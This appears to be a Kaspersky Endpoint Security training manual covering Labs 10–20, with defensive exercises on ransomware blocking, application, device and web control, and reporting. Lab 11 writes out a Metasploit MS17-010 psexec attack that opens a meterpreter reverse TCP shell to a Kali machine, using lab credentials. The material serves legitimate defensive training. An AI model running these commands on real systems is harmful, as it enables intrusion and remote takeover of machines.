Scenario. Of all threats, you are most concerned about crypto ransomware. If Kaspersky Endpoint Security fails
to detect a new malware version one day, the company will lose much money. To decrease the risk, configure
Host Intrusion Prevention to prohibit all programs except for trusted from editing documents on the computers.
Simulate a ransomware infection
Prohibit all programs except for trusted from editing and deleting documents
Configure Host Intrusion Prevention events to be stored on the Administration Server
Simulate encrypting a document and check the result
Find the ransomware.bat script on the desktop of the Tom-Laptop computer and run it. It is designed to
encrypt text documents and delete the original files.
Find the ransomware.bat and

invoice.txt files on the desktop
Run the ransomware.bat file
Make sure that the invoice.txt file has
gone and the invoice.txt.aes file has
appeared instead
Open the invoice.txt.aes file in Notepad

Make sure that the invoice.txt.aes file is
encrypted
Close Notepad
KL 002.11.6: Lab 10.
Open the Host Intrusion Prevention settings in the Kaspersky Endpoint Security policy. Find the list of
protected resources. Create a Documents category. Add files with the *.txt extension to it. Prohibit all programs
except for trusted from editing, deleting and creating files of this category.
Open Kaspersky
Security Center Web
Console
On the side menu,
select Devices |
Polices & Profiles
Open the policy of
Kaspersky
Endpoint Security
for Windows
Switch to the
Application
settings tab
In the Advanced
Threat Protection
section, click Host
Intrusion
Prevention
KL 002.11.6: Lab 10.
Enable the Host

Intrusion
Prevention
component
To open the list of
rights, click the link
Application rights
and protected
resources
To create a new
category, in the left
pane, click Add
Select Category of
protected
resources
Type Protected files
for the category
name
Click the link
Operating system
Select the Personal

data subcategory
Click OK twice
KL 002.11.6: Lab 10.
Add a subcategory: In
the left pane, click
Add
Select Category of
protected
resources
Type Documents
for the name
Click the Operating
system link
Select the
Protected Files
subcategory
Click OK twice
Add file types to the

category. In the left
pane, click Add
KL 002.11.6: Lab 10.
For the resource

type, select File
or folder
In the Path to file or
folder box, enter
*.txt, and in the
Display name for
the list of
categories field,
type txt
Click the link
Operating system
Select the
Documents
subcategory
Click OK twice
To select the category Personal Data | Protected files, click on an empty space within the Protected files
row
To prohibit
applications that
have Low and High
Restricted
reputation from
editing files that
belong to this
category, change
the action for Write,
Delete and Create
operations to Block
Configure Host
Intrusion Prevention
to log attempts to
edit documents.
Enable Log events:
Write, Delete and
Create for all the
block actions
Click OK twice to save the application rights

Click Save to save the policy
KL 002.11.6: Lab 10.
Open event settings in the policy. Find information events of Host Intrusion Prevention: Application placed in
restricted group and Application Privilege Control rule triggered. Configure the policy to store these events
on the Administration Server.
Open the properties of

Kaspersky Endpoint
Security for
Windows policy
Go to the Event
configuration tab and
switch to the Info section
Click Add events
Select the events

Application placed in
restricted group and
Host Intrusion
Prevention
was triggered
Click OK
policy
KL 002.11.6: Lab 10.

Monitoring & Reporting
| Event Selections
To create a new event
selection, click Add
Type Host Intrusion

Prevention Events for
the selection name
Switch to the Events

section
In the Application name
field, select Kaspersky
Endpoint Security
Specify the Severity
level: Info
Select the option Include
selected general events
Clear all checkboxes: On
each of the 4 pages,
clear the checkbox next
to Severity level
On the list of events, select

— Application placed in restricted group
— Host Intrusion Prevention was triggered
Click Save
KL 002.11.6: Lab 10.
Find the ransomware.bat script on the desktop of the Alex-Desktop computer and run it. It is designed to encrypt
text documents and delete the original files. Make sure that the script cannot delete the text file this time.
Consult the Host Intrusion Prevention events on the Administration Server. Make sure that it was Host
Intrusion Prevention that did not allow the script to delete the text document.
Find the
ransomware.bat and
invoice.txt files on the
desktop
Run the
ransomware.bat file
Make sure that the invoice.txt.aes file has appeared on the desktop, but the invoice.txt file has not been
deleted
Open Kaspersky
Security Center Web
Console
On the side menu,
select Monitoring &
Reporting | Event
Selections
Select Host Intrusion
Prevention Events
Click Reconfigure
sorting and start
to display the event
selection
KL 002.11.6: Lab 11.
Kaspersky Endpoint Security and Management How to test Network Threat Protection
Study the events in

the selection. Make
sure that it was Host
Intrusion Prevention
that did not allow the
program to delete
the document
You have configured Host Intrusion Prevention to allow only trusted programs to edit text documents. To
properly protect against ransomware, add more document types to the category: *.doc, *.docx, *.xlsx, etc.
Programs by known vendors (such as Microsoft Office) are trusted, and Host Intrusion Prevention will not restrict
them. Ransomware, even new that has not yet been added to the signature database or KSN, will never get in
the trusted category and will not be able to edit documents.
Scenario. You scan your network periodically with a special security scanner to find out whether the computers
are properly shielded. Kaspersky Endpoint Security blocks attacks on the scanned computers and then blocks any
connections from the attacking computer for an hour. Add the computer from which you perform vulnerability
scanning to the list of exclusions.
Disable Exploit Prevention

Imitate a network attack from Kali on Alex-Desktop
Study the Network attack report
Unblock the Kali computer
Configure the Network Threat Protection not to block Kali
Imitate an attack from Kali on Alex-Desktop and check the results
To check health of Network Threat Protection, we will use the Metasploit Framework penetration testing utility.
In this task, you will disable the Exploit Prevention protection component because it may react earlier than
Network Threat Protection.
KL 002.11.6: Lab 11.
The KSC, DC, Kali, Alex-Desktop and Tom-Laptop machines must be powered on.
Open Kaspersky
Security Center Web
Console
On the side menu,
select Devices |
Policies & Profiles
Open the policy of
Kaspersky Endpoint
Switch to the
tab
Disable Exploit
Prevention
On the Kali computer, run the Metasploit Framework penetration testing utility. Carry out an attack that exploits
a vulnerability in the Server Message Block protocol.
The task is performed on Kali.

Run the terminal
KL 002.11.6: Lab 11.
Start the Metasploit Framework console. Carry out the following command:
msfconsole
Select the exploit template. Carry out the following command:

use exploit/windows/smb/ms17_010_psexec
10. Specify the malicious payload. Carry out

set payload windows/x64/meterpreter/reverse_tcp
Specify the address of the listening server (address of the Kali computer). Carry out the following command:
set LHOST 10.28.0.50
Specify the address of the victim machine. Carry out the following command:
set RHOSTS 10.28.0.100
Specify the victim’s account. Carry out the following command:

set smbuser alex
Specify the victim’s account. Carry out the following command:

set smbpass Ka5per5Ky
Activate the exploit. Carry out

exploit
Note that you cannot exploit the vulnerability
The attack fails because Kaspersky Endpoint Security blocks network attacks by default.
KL 002.11.6: Lab 11.
Find the list of reports in the Administration Console. Create a new template for the Network attack report.
Generate the report, consult the details of the network attack, find the addresses of the attacking and
attacked machines.
Open Kaspersky
Security Center
Web Console
On the side menu,
select Monitoring
& Reporting |
Reports
Click Add
Name the report

Network Attack
Report
Under Threat
statistics, select
the report type
Report on
network attacks
Click Next
Click Next
KL 002.11.6: Lab 11.
Select to include
information over
the last 30 days
Click OK
In the message
box, click Save
and run
Switch to the
Details tab
KL 002.11.6: Lab 11.
Find the IP address

of the attacking
computer and
DNS name of the
attacked machine
in the report
Close the report
On the side menu,

click Event
Selections
Click Add to
create a new
event selection
Name the selection

Network attacks
Switch to
the Events
section
In the Application
name field, select
Kaspersky
Endpoint
Security
For the Severity
level, select
Critical
Choose Include
selected
general events
KL 002.11.6: Lab 11.
On the list of
events, find
and select the
Network attack
detected event
Click Save to save
the event selection
In the message
window, select the
checkbox Go to
selection result
and click Save
Study the events

in the selection
Open Kaspersky Endpoint Security on the attacked computer. Open the Network Monitor window. Find the list
of blocked computers and unblock the Kali computer.
KL 002.11.6: Lab 11.
Open Kaspersky Endpoint Security interface:

Click its icon in the notification area
Click Network Monitor
The Network
Monitor window
will open
Switch to the
Blocked
computers section
Unblock the Kali computer: Select address 10.28.0.50 and click Unblock
Close all Kaspersky Endpoint Security windows
KL 002.11.6: Lab 11.
In the Kaspersky Endpoint Security policy, open the Network Attack Blocker settings. Find the list of
trusted computers and add the IP address of the Kali computer (10.28.0.50) to it.
Open Kaspersky
Security Center Web
Console
On the side menu,
select Devices |
Policies & Profiles
Open the policy of
Kaspersky Endpoint
Security for
Windows
Switch to the
tab
Go to the Essential
Threat Protection
section
Click the link
Network Threat
Protection
Open the list of

trusted computers:
Click the link
Exclusions
KL 002.11.6: Lab 11.
Click Add
Type the IP address of
the Kali computer,
10.28.0.50, and click
OK
Click OK
Click Save to save
the policy
be applied
Simulate another attack on the computer Alex-Desktop from Kali using Metasploit Framework. Make sure
that Kaspersky Endpoint Security does not react to this attack anymore.
The task is performed on Kali.

Open a Terminal window
Activate the exploit again. Carry out the following command:

exploit
Make sure that you have exploited the vulnerability in SMB protocol
Access the standard shell on the target system. Carry out:

shell
Optional: carry out the dir command to display the directories

KL 002.11.6: Lab 12.
Kaspersky Endpoint Security and Management How to configure password protection
You have configured Network Threat Protection not to react to attacks from the specified IP address. You can
use this method to exclude addresses of network security scanners.
Also, you have created a new report and a new event selection. There are many types of reports in Kaspersky
Security Center. If the pre-configured reports available on the Reports tab are insufficient, have a look at the
complete list of reports that you can create. If none of them yet meets your needs, create a selection of events
that interest you. Configure conditions: event types, time, group of computers, etc.
Scenario. To prevent the users from disabling the protection, prohibit managing Kaspersky Endpoint Security
and Network Agent without a password.

Find a computer where protection is disabled
Set a password for local management of Kaspersky Endpoint Security
Make sure that Kaspersky Endpoint Security is password-protected
Set a password for Network Agent uninstallation
On Tom-Laptop, exit Kaspersky Endpoint Security.
Using the web console’s Dashboard, find information that protection is disabled on some computers. Go to the
selection of computers where protection is off. Open the computer properties, find the Kaspersky Endpoint
Security application and start it.
Start the task on Tom-Laptop.
Log on to the abc\Tom account. Password—Ka5per5Ky

Exit Kaspersky Endpoint Security using the shortcut menu of its
icon
KL 002.11.6: Lab 12.
Switch to the KSC computer
Log on to the abc\Administrator account. Password—Ka5per5Ky
Open
Kaspersky
Security
Center Web
Console
On the side
menu, select
Monitoring &
Reporting |
Dashboard
Note that one of the devices has the Critical protection status
Click the Critical link to consult the list of devices that have this status
Make sure that

protection is
not running on
Tom-Laptop
Click the Tom-Laptop link to open the device properties
Switch to the
Applications
tab
Select
Kaspersky
Endpoint
Security and
click Start
Close the
computer
properties
KL 002.11.6: Lab 12.
On the side
menu, select
Monitoring &
Reporting |
Dashboard
Note that the
protection
status has
changed
In the policy of Kaspersky Endpoint Security for workstations, find password protection among the Interface
settings. Enable password protection and apply it to critical operations with Kaspersky Endpoint Security.
On the Tom-Laptop computer, try to exit Kaspersky Endpoint Security. Make sure that you cannot exit the
application without the password. Try to uninstall Kaspersky Endpoint Security through the Windows Control
Panel. Make sure that this operation is also password-protected.
Open Kaspersky
Security Center
Web Console
On the side
menu, select
Devices |
Policies &
Profiles
KL 002.11.6: Lab 12.
Open the policy

of Kaspersky
Endpoint
Security for
Windows
Switch to the
Application
settings tab
In the General
settings
section, click
Interface
Click the
Password
protection
DISABLED
switcher
Enter the
password
Ka5per5Ky
Click OK
Click Add to
specify a user
Click the link

Select user
KL 002.11.6: Lab 12.
In the search
box, type alex
Choose the
Alex account
Click Select
Select the following operations:

— Application settings
— Remove / modify / restore the
application
— Disable Kaspersky Security Center
policy
— Exit the application
Click OK
Make sure that the Alex user has been

added to the list
Click OK to save the changes
Save the policy: Click Save and Yes

Wait for the policy to be applied
KL 002.11.6: Lab 12.
Make sure that you need to enter credentials to perform some actions within the program.
Log on to the abc\Tom account. Password—

Ka5per5Ky
Try to exit KES using the shortcut menu of its icon
in the taskbar
In the Password check window, enter the

abc\Alex account and password Ka5per5Ky
Make sure that the application has been closed
successfully
Open the Apps & features settings

Select Kaspersky Endpoint Security for
Windows
Make sure that the Uninstall button appears
dimmed
KL 002.11.6: Lab 12.
Open the Network Agent policy and find the password protection settings there. Enable password protection, type
a password and make these settings required (prohibit users from modifying them).
On the Tom-Laptop computer, try to uninstall the Network Agent. Do not enter the password and make sure
that you cannot uninstall Network Agent without it.
Open Kaspersky
Security Center
Web Console
On the side menu,
select Devices |
Policies & Profiles
Open the policy of
Kaspersky Security
Center Network
Agent
Switch to the
Application
settings tab
In the Settings
section, enable
password protection:
Use uninstallation
password
Enter the password
Ka5per5Ky
Enforce the Use
uninstall password
setting (lock it) and
click Save
be applied
KL 002.11.6: Lab 12.
Switch to Tom-Laptop.
Open the Apps & features settings

Select Kaspersky Security Center
Network Agent
Click Uninstall to try to remove it
In the Windows information window,
confirm that you want to uninstall
the application
On the welcome page of the uninstallation

wizard, click Next
Click Next without entering a password
Make sure that Network Agent cannot be
uninstalled without the password
Click OK to close the error message

Click Cancel to exit the wizard
Confirm that you want to exit: Click Yes
Click Finish to close the wizard
You have enabled password protection for Kaspersky Endpoint Security and Network Agent. Now the users
cannot uninstall Kaspersky applications, exit Kaspersky Endpoint Security or stop protection.
Neither can they stop the service or process of Kaspersky Endpoint Security. Kaspersky Endpoint Security self-
defense prevents this.
To hide the fact that Kaspersky Endpoint Security is installed on the computer from the users, select not to
display KES icon in the notification area. This setting is located in the Interface section of Kaspersky Endpoint
Security policy.
KL 002.11.6: Lab 13.
Kaspersky Endpoint Security and Management How to configure Application Control
Scenario. According to the corporate security policy, Internet Explorer is the only allowed web browser. All
available security updates are downloaded for it on a regular basis, while the updates of other browsers are not.
Considering the fact that malware typically penetrate a network through browsers today, the decision to prohibit
all other browsers was made.
Your task is to enforce the security policy requirements. You need to block all browsers except for Internet
Explorer using Application Control.
Create a category for all web browsers except Internet Explorer

Prohibit the users from starting any web browsers except for Internet Explorer
Run Mozilla Firefox and Internet Explorer
Create an application category that includes all browsers except for Internet Explorer 11.0 or later. To add all
browsers, use Kaspersky (KL) categories. To exclude Internet Explorer, use the metadata of the iexplore.exe file.
Open Kaspersky Security

Center Web Console
Operations | Third-party
applications |
Application categories
To create a new
category, click Add
Specify Browsers for the
category name
KL 002.11.6: Lab 13.
For the category creation

method, select
Category with content
added manually
Click Next
To specify a new condition

for the category, click
Add
Select From KL
category
Click Next
Select the category

Browsers |
Web Browsers
Click Next
12. Click Next

KL 002.11.6: Lab 13.
Specify exclusions. Click

Add
On the list of exclusion

conditions, choose Hash,
metadata or certificate
On the drop-down list,
select Specify manually
Click Next
Switch the condition to

Metadata
Select File Name
Type IEXPLORE.EXE
(Important: in capital
letters)
Click Next
Click OK
Open the Application Control settings in the policy. Enable Application Control and select the Block mode
instead of Notify.
Add a rule that prohibits starting programs of the Browsers category that you created in the previous task.
KL 002.11.6: Lab 13.
On the side menu,

select Devices |
Policies &
Profiles
Open the policy of
Kaspersky
Endpoint
Security for
Windows
Switch to the
Application
settings tab
Select the
Security
Controls section
Select the
Application
Control
component
Enable
Application
Control
Switch the
component to the
block mode: select
Kaspersky
Endpoint
Security for
Windows blocks
startup of
applications
that are blocked
by Application
Control settings
Click the link

Rules Lists Settings
KL 002.11.6: Lab 13.
Add a category to
the denylist. Click
Add
Click the link

Please choose a
category
Select the
Browsers
category
Click OK
KL 002.11.6: Lab 13.
Make sure that the

Browsers
category is
blocked for
all users
Click OK
Enable this
category if it has
not been enabled
automatically
Click OK
Save the policy:
Click Save and
Yes
Wait for the policy
to be applied
Make sure that the users are able to launch Internet Explorer but not Mozilla Firefox.
40. Log on to the abc\Alex account, password Ka5per5Ky

KL 002.11.6: Lab 14.
Kaspersky Endpoint Security and Management How to block start of unknown applications in the network
Run the Mozilla Firefox browser

Note that Kaspersky Endpoint
Security blocks Firefox and
informs the user about it
Click OK to close the error

message
Run the Internet Explorer browser

Make sure that Kaspersky
Endpoint Security does not block
Internet Explorer
If you need to allow or prohibit a group of programs, Kaspersky categories come in very handy. The categories
are updated when database updates are run, and you can feel confident that the latest versions of popular
browsers are added and applied automatically.
When setting up Application Control, remember: Rules configured to deny access will always have a higher
priority than ones that allow access. For this reason, if you need to prohibit a program category except for a few
applications, you will need to create a rule to block access and add exclusions for the allowed applications, which
was demonstrated in this lab. Any other configuration will not work.
Scenario. Application Control, as well as Host Intrusion Prevention, can help reduce the risk related to new
malware. Let us configure Application Control to block start of all files except for trusted within specific
operating system directories.
KL 002.11.6: Lab 14.
Create an application category that prohibits starting unknown files

Change the policy so as to prohibit all users from starting unknown files
Make sure that the settings work correctly
In this task, you will create an application category for crypto ransomware.
Open Kaspersky
Security Center
Web Console
Go to Operations |
Third-party
applications |
Application
Categories
Click Add to create
a new category
Type Protection
Cryptomalware for
the category name
For the category
creation method,
select Category
with content
added manually
Click Next
KL 002.11.6: Lab 14.
To create a condition,
click Add
Copy the Conditions_Protection_Cryptomalware.txt file to your desktop. The file is located in

“Z:\LabFiles\Lab14\”
Open the file
Conditions_
Protection_
Cryptomalware.txt
in Notepad
Select Specify
path to
application
(masks
supported)
Click Next
Select and copy the first line from the file Conditions_Protection_Cryptomalware.txt
Paste the copied

line and click Next
Click Add to
include the other
values
KL 002.11.6: Lab 14.
In a similar manner,
add all other paths
from Conditions_
Protection_
Cryptomalware.txt
Click Next
Specify exclusions.
Click Add
Select From KL
category
Click Next
KL 002.11.6: Lab 14.
Select all KL
categories
Click Next
22. Click OK
KL 002.11.6: Lab 14.
Confirm creating the

category. Click
OK
Open the Application Control settings in the policy. Enable Application Control and select the Block mode
instead of Notify.
Add a rule that prohibits starting programs of the Protection_Cryptomalware category that you created in
the previous task.
On the side menu,

select Devices |
Policies & Profiles
Open the policy of
Kaspersky
Endpoint Security
for Windows
Switch to
the Application
Settings tab
Select the Security
Controls section
Select the
Application
Control component
KL 002.11.6: Lab 14.
Click the link Rules

Lists Settings
30. Click Add
Click the link Please

choose a category
On the list of
categories, select
Protection
Cryptomalware
Click OK
KL 002.11.6: Lab 14.
34. Click OK
35. Click OK
Click OK
Save the policy: Click
Save and Yes
be applied
In this task, you will make sure that Kaspersky Endpoint Security blocks start of unknown files.
KL 002.11.6: Lab 14.
Log on to the abc\Alex account, password

Ka5per5Ky
Double-click ransomware.bat to run it
Note that KES blocks ransomware.bat and displays
the corresponding notification
Click OK to close the error message
Open Kaspersky
Security Center
Web Console
On the side menu,
select Devices |
Policies & Profiles
Open the policy of
Kaspersky Endpoint
Switch to the
Application
settings tab
Select the Security
Controls section
Select the Application
Control component
KL 002.11.6: Lab 15.
Kaspersky Endpoint Security and Management How to block USB flash drives
Disable
the Application
Control component
Click OK
policy
applied
This lab demonstrates how the administrators, by properly configuring the product, can block the start of new
and unknown files on the endpoints. By doing so, they will reduce the risk of infection on the protected machines.
Scenario. Incident analysis has revealed that a bunch of computers had become infected through USB flash
drives. The decision was made to eliminate this penetration vector. Your task is to block access to all USB
flash drives using Kaspersky Endpoint Security on all workstations in ABC network.

Configure blocking USB flash drives
Test blocking USB flash drives
Receive the request from the user
In this task, we will learn how to configure blocking USB flash drives in the policy.
KL 002.11.6: Lab 15.
Log on to the abc\Tom account. Password—Ka5per5Ky
From desktop, click vhui64. Expand USB

Hubs and then expand Desktop Hub.
Right-click KL_EDU and select Use this

device.
On the Tom-Laptop computer, click

Start,
Computer
Make sure that the USB flash drive has
been connected successfully
KL 002.11.6: Lab 15.
Open Kaspersky
Security Center
Web Console
On the side
menu, select
Devices |
Policies &
Profiles
Open the policy
of Kaspersky
Endpoint
Security for
Windows
Switch to the
Application
settings tab
Select the
Security
Controls section
Select the Device
Control
component
Click the link

Access rules for
devices and Wi-
Fi networks
KL 002.11.6: Lab 15.
Click the link

Removable
drives
Note that access
to devices
Depends on
connection bus
Under Access,
select Block
Click OK
Make sure that

access to
Removable
drives is set to
Block
Click OK
Click Save to
save the policy
Wait for the policy
to be applied
KL 002.11.6: Lab 15.
In this task, we will try to access the device already connected to the computer.
Log on to the abc\Tom account.

Password—Ka5per5Ky
Note that the USB flash drive is still
shown among Devices and drives
Open the USB flash drive

Note that despite the fact that the
removable drive is visible, it is
inaccessible
Close the Windows message
Click Request access
Read the message

Click Send
KL 002.11.6: Lab 15.
In this task, we will receive the USB drive access request from the user.
Open
Kaspersky
Security
Center Web
Console
On the side
menu, select
Monitoring &
Reporting |
Event
Selections
Click User
requests
Read the
request
In this lab, we studied how to block access to removable drives. Aside from blocking access completely, you can
also allow access upon request or allow specific devices only. Typically, administrators will use this functionality
to block the spread of malware through removable drives on the network. This feature can also help to prevent
data leakage.
KL 002.11.6: Lab 16.
Kaspersky Endpoint Security and Management How to configure granular permissions for USB flash drives
Scenario. You have prohibited access to USB flash drives throughout the company. However, the measure
turned out to be too aggressive as some users need USB flash drives for work related tasks. The decision to allow
all users to use encrypted USB flash drives has been made at the company.
Now, we will allow the users to read and copy files from USB flash drives; add encrypted USB flash drives
to trusted devices and thus allow domain users to access them without limitations; and also configure
logging operations with these USB flash drives.
Prohibit all users from writing files to USB flash drives

Allow the domain users to write files to trusted USB flash drives
Open the Device Control settings in the Kaspersky Endpoint Security policy. Enable the users (Everyone) to
read files from removable drives.
Log on to the abc\Tom account. Password—

Ka5per5Ky
From desktop, click vhui64. Expand USB Hubs and
expand Desktop Hub.
Right-click KL_EDU and select Use this device.
Click Start,
Computer
Make sure that
the USB flash
drive has been
connected
successfully
KL 002.11.6: Lab 16.
Open Kaspersky Security Center Web Console
On the side menu,

select Devices |
Policies
& Profiles
Open the policy of
Kaspersky
Endpoint
Security for
Windows
Switch to the
Application
settings tab
Select the
Security
Controls section
Select the Device
Control
component
Click the link

Access rules
for devices and
Wi-Fi networks
KL 002.11.6: Lab 16.
Click the link

Removable
drives
Note that access
to removable
drives is set to
Block
Prohibit the users

from writing to
removable
drives: Clear the
Write checkbox
and click OK
Save the policy
and wait for it
to be enforced
Open the USB flash drive

Copy any file from the flash drive to the desktop
Try to copy a file from the desktop to the USB flash drive
Make sure that Kaspersky Endpoint Security does not permit copying
to the flash drive
KL 002.11.6: Lab 16.
21. Close the Windows message
Open the Device Control settings in the Kaspersky Endpoint Security policy. Make the removable drive trusted
for the Domain users group. Select to log events when users write files to USB flash drives.
Open Kaspersky
Security Center
Web Console
On the side
menu, select
Devices |
Policies &
Profiles
Open the policy
of Kaspersky
Endpoint
Security for
Windows
Switch to the
Application
settings tab
Select the
Security
Controls section
Select the
Device Control
component
KL 002.11.6: Lab 16.
Click the link

Access rules
for devices and
Wi-Fi networks
Click the link

Removable
drives
Open the
Logging tab
ENABLE
Logging
Click the Add
button at the
bottom of the
window to
specify a
user group
KL 002.11.6: Lab 16.
Type everyone
and click the
magnifying
glass icon
Choose the
Everyone group
Click Select
Click OK
Click the link

Trusted devices
Make the
removable drive
trusted: click
Add device by
ID
KL 002.11.6: Lab 16.
On the list of
devices, select
Generic
Flash Disk
USB Device
Click Next
Select the
Domain
Users group
Click Next
Click OK
Make sure that

the device has
become trusted
for the Domain
Users group
Click OK
KL 002.11.6: Lab 16.
Switch to the
Application
settings tab
Go to the
General
settings section
Click Interface
In the
Notifications
area, click the
Notification
settings link
Select the
Device Control
component
Select to Save
in local report
the File
operation
performed
event and click
OK
Click Save to
save the policy
Wait for the
policy to be
applied
54. Copy the invoice.txt file from the desktop to the USB flash drive
KL 002.11.6: Lab 17.
Kaspersky Endpoint Security and Management How to configure web access control
Make sure that Kaspersky Endpoint Security allows you to write files to a trusted device
Open Kaspersky Security

Center Web Console
Monitoring & Reporting
| Reports
Click Report on file
operations on
removable drives
Switch to the Details tab

Make sure that the report
informs that the
ABC\Tom user saved
the invoice.txt file to a
removable drive
In this lab, we studied how to control user access rights to USB flash drives along with making exclusions for
specific drive types. There are always users at a company (secretaries, for example) who need to copy data
to/from various USB flash drives whose model and serial number are usually not known in advance.
Others (like administrators, for example) typically have this information readily available. You can configure
exclusions for these drives. The policy provides for flexible adjustments: You can create a list of specific USB
flash drives that are to be accessible and specify users and/or groups who use them.
Scenario. When analyzing the company’s internet traffic, you have found that many users visit cryptocurrency
exchange websites during business hours. Based on this information, you would like to prohibit that by setting up
a policy to specifically block access to the respective content category.
KL 002.11.6: Lab 17.
Create a rule to block access to cryptocurrency exchange websites

Test whether access to cryptocurrency exchange websites is blocked
Consult reports in Kaspersky Security Center
In this task, we will configure the policy to block access to cryptocurrency exchange websites for all users
during business hours.
Open Kaspersky
Security Center
Web Console
Go to Devices |
Policies & Profiles
Open the policy of
Kaspersky Endpoint
Switch to the
Application
settings tab
Select the Security
Controls section
Select the Web
Control component
KL 002.11.6: Lab 17.
7. Click Add
In the Rule name box,

type Cryptocurrencies
For the Action, select
Block
Select the checkbox
By content categories
Click the link Content
categories
On the Content
Categories list, under
Online stores,
banks, payment
systems, select
Cryptocurrencies,
mining
Click OK
KL 002.11.6: Lab 17.
Select Apply to
individual users and
/ or groups
Click Add
In the search box, type

everyone
Choose the respective
group
Click Select
KL 002.11.6: Lab 17.
Make sure that the

Cryptocurrencies
blocking rule has
been created
Click OK
policy
applied
In this task, we will make sure that the rule has been applied and the Cryptocurrencies and mining category
is blocked.
Log on to the abc\Tom account.

Password—Ka5per5Ky
Start Internet Explorer
Go to www.coinmarketcap.com
Make sure that the rule blocks access to
cryptocurrency exchange websites
Close the Internet Explorer window
KL 002.11.6: Lab 17.
Open Kaspersky
Security Center
Web Console
Monitoring &
Reporting | Event
Selections
Click Recent events
Open the last event from

Tom-Laptop
Note that Web Control

blocked access to website
www.coinmarketcap.com
KL 002.11.6: Lab 18.
Kaspersky Endpoint Security and Management How to configure Adaptive Anomaly Control
In this lab, we studied the functionality that blocks access to web resources. Access can be allowed or blocked by
content category, data type or both. Access can be blocked during a specified time period only and be applied to user
groups or specific users. A typical use example for this functionality is blocking access to social networks, executable
files or external email, through which information may leak, and/or infected objects can be downloaded.
Scenario. Kaspersky Endpoint Security features a component that monitors scripts and macros and detects
system anomalies. You have decided to test health of this protection component. For this purpose, you will use
a Word file with a macro that contains an obfuscated PowerShell script prepared beforehand.

Configure blocking macros and scripts in office documents
Make sure that Adaptive Anomaly Control blocks a malicious macro
Disable all main protection components. By default, the Adaptive Anomaly Control protection component works in
the statistics mode at first and collects data about started programs and scripts. To test how the component
detects malicious files, switch it to the block mode manually.
Open Kaspersky
Security Center
Web Console
On the side menu,
select Devices |
Policies & Profiles
Open the policy of
Kaspersky Endpoint
KL 002.11.6: Lab 18.
Switch to the
Application
settings tab
Select Security
Controls
Open the settings of the
Adaptive Anomaly
Control component
Enable Adaptive
Anomaly Control
Click the Rules link to
configure detection
rules
Expand the list of rules Activity of office applications

Switch the rules to the block mode: Change the action from Smart to Block for the following rules:
— Start of Microsoft Console Based Script Host from office application
— Start of Microsoft Windows Based Script Host from office application
— Start of Microsoft Windows Command Processor from office application
— Start of Microsoft PowerShell from office application
KL 002.11.6: Lab 18.
Save the policy: Click

OK and Save
Confirm that you want
to use the specified
settings: Click Yes
enforced
Send a message with an attachment that contains a malicious script and make sure that the file will be blocked.
Run Microsoft Outlook

Create a new message:
— Specify the addressee.
In the To box, type
tom@abc.lab
— In the Subject box, type
Weekly report
— Attach the Weekly
report (ps).doc file
located in
Z:\LabFiles\Lab18
Click Send to dispatch the
message
KL 002.11.6: Lab 18.
Run Microsoft Outlook

Open the Weekly report
(ps).doc attachment
In the Microsoft Word

window, click Enable
Content
Make sure that a message

informing about prohibited
PowerShell.exe start has
appeared
Click OK
Make sure that it was
Kaspersky Endpoint Security
that blocked the action
KL 002.11.6: Lab 19.
Kaspersky Endpoint Security and Management How to configure the dashboard
Open the application report

Select Adaptive Anomaly
Control
Find and read the event
about a blocked action
Close the Microsoft Word
window
In this lab, we have studied the Adaptive Anomaly Control component. It can either notify the administrator about
a script run or abnormal program behavior, or block a process, macro or powershell.
Scenario. In your daily routine, you open the Kaspersky Security Center management console to monitor if
protection is in place and check if there are some threats or issues that require your attention. To have a
quick protection status overview, configure the dashboard to summarize the health of your systems.
Contents. In this lab, you will configure the dashboard for daily monitoring.
KL 002.11.6: Lab 19.
Open the Kaspersky

Security Center
Web Console
On the side menu,
select Monitoring &
Reporting |
Dashboard
Note that Kaspersky
Security Center
Web Console has a
few preset widgets
To create a new
widget, click Add or
restore web widget
KL 002.11.6: Lab 19.
Expand Update and

select Distribution
of anti-virus
databases
Click Add
A new widget has

been added to
the page
Click Add or restore
web widget
KL 002.11.6: Lab 19.
Expand Threat
statistics and select
History of network
attacks
Click Add
To edit the widget’s

representation, click
its gear icon
Select Chart type:
Lines
KL 002.11.6: Lab 19.
Widget’s
representation has
changed
Delete unnecessary widgets and rearrange the others on the dashboard.
In the New devices widget,

click the gear icon and select
Hide web widget
KL 002.11.6: Lab 20.
Kaspersky Endpoint Security and Management How to configure maintenance tools
Click OK to confirm
Note that the widgets have
moved to close the gap
On the Most frequent

threats widget, click the
gear icon and select Move
Click the Threat activity
widget that currently takes
the place where you want to
move the current widget to
The Most frequent threats

widget has been relocated
You have added the widgets that you need to the dashboard, which shows the most important information
about network protection.
Scenario. To be able to find the necessary information and react to threats quicker, delete the reports that you
do not use, prepare a virus scan task that can be started from computers’ shortcut menus, and configure weekly
reports to be emailed to you.
KL 002.11.6: Lab 20.

Delete unused reports
Create a report about computers infected over the previous week
Configure the most important reports to be emailed
Delete all reports except for:

– Kaspersky software version report
– Threats report
– Report on prohibited applications
– Most infected computers report
– Report on users of infected devices
– Web control report
– Protection deployment report
– Network attack report
– Protection status report
– Report on file operations on removable drives
– Key usage report
– Anti-virus database usage report
Open Kaspersky Security Center Web Console

Go to Monitoring & Reporting | Reports
Select Report
on errors
Click
Click Delete
KL 002.11.6: Lab 20.
Confirm that
you want to
delete the
report: Click
OK
KL 002.11.6: Lab 20.
Delete the following reports in a similar manner:

— Hardware report
— Report on incompatible applications
— Report on file encryption errors
— Report on blockage of access to encrypted files
— Report on device users
— Report on effective user permissions
— Report on encryption status of mass storage devices
— Report on hardware registry
— Kaspersky software version report
— Report on key usage by virtual Administration Server
— Report on rights
— Report on rights about access to encrypted devices
— Report on test blocked runs
— Software updates report
— Vulnerabilities report
— Report on attacked controllers
— Report on check of programmable logic controllers (PLCs) for integrity
— Report on results of update installation of third-party software
KL 002.11.6: Lab 20.
Rename the Report on most heavily infected devices to Monthly report on most heavily infected devices;
then create a weekly report.
Open the
properties of the
Report on most
heavily infected
devices
Rename it to
Monthly report
on most heavily
infected devices
and click Save
Close the report
window
Create a new
report: Click
the Add button
KL 002.11.6: Lab 20.
Name the report

Weekly report
on most heavily
infected devices
Expand Threat
statistics and
select Report on
most heavily
infected devices
Click Next
Select
Administration
group and specify
Managed devices
Click Next
Set the reporting

period to 7 days
and click OK
In the window that

opens, click Save
KL 002.11.6: Lab 20.
Configure the following reports to be emailed weekly on Mondays at 10am:
— Protection status report

— Anti-virus database usage report
— Weekly report on most heavily infected devices
— Network attack report
Open Kaspersky
Security Center
Web Console
On the side menu,
select Devices |
Tasks
